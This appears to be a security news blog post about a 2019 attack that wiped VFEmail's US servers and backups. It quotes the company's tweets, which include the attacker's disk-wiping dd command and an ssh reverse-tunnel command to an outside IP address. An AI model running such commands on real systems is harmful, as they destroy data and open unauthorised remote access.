Disaster. There’s no other word for it.

Customers of VFEmail, a Milwaukee-based email provider for businesses and end-users since 2001, has revealed that it has suffered a ‘catastrophic’ attack after a hacker breached its systems and wiped out all of the data it was storing on its US-based servers.

A message posted on VFEmail’s website confirms the bleak news:

“We have suffered catastrophic destruction at the hands of a hacker… This person has destroyed all data in the US, both primary and backup systems. We are working to recover what data we can.”

According to VFEmail, it actually spotted the hacker as they were trying to cause even more damage – formatting other mail servers run by the company in the Netherlands.

Caught the perp in the middle of formatting the backup server:

dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559

via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null aktv@94.155.49.9 -R 127.0.0.1:30081:127.0.0.1:22 -N — VFEmail.net (@VFEmail) February 11, 2019

Fortunately for those customers whose data was stored on servers in the Netherlands, it appears that their backups have not been impacted. But for the rest of VFEmail’s customers the news is not so good…

At this time, the attacker has formatted all the disks on every server. Every VM is lost. Every file server is lost, every backup server is lost. NL was 100% hosted with a vastly smaller dataset. NL backups by the provideer were intact, and service should be up there. — VFEmail.net (@VFEmail) February 11, 2019

US-based users are currently being urged not to try to connect their email clients to VFEmail’s servers, for fear that they might accidentally wipe out the only remaining copy of their email archive on their own computers:

“At this time I am unsure of the status of existing mail for US users. If you have your own email client, DO NOT TRY TO MAKE IT WORK. If you reconnect your client to your new mailbox, all your local mail will be lost.”

My advice, if you find yourself in this unfortunate pickle, is that you backup any local email archive you may have as quickly as possible to avoid any accidents.

There will be many angry customers of VFEmail who will be distraught at the thought that years’ worth of irreplaceable personal and business correspondence may have been wiped out. It’s understandable that some might turn their fury towards VFEmail, and ask tough questions about why their systems weren’t better protected to keep the hacker out.

However, I think it’s worth also recognising that VFEmail is a victim too. A business that has been running for almost 20 years has fallen victim to a devastating criminal attack perpetrated by a malicious hacker, that will find hard to recover from commercially. Hacking acts like this have real human consequences – both for the companies that are hacked, and for their clients.

I can’t help but feel incredible sympathy for not only VFEmail’s customers, but also for VFEmail itself. The firm has found itself targeted by hackers before (in 2015, it was one of several email providers targeted by DDoS extortionists), but has never had experienced anything quite as bad as this.

Found this article interesting? Follow Graham Cluley on Twitter to read more of the exclusive content we post.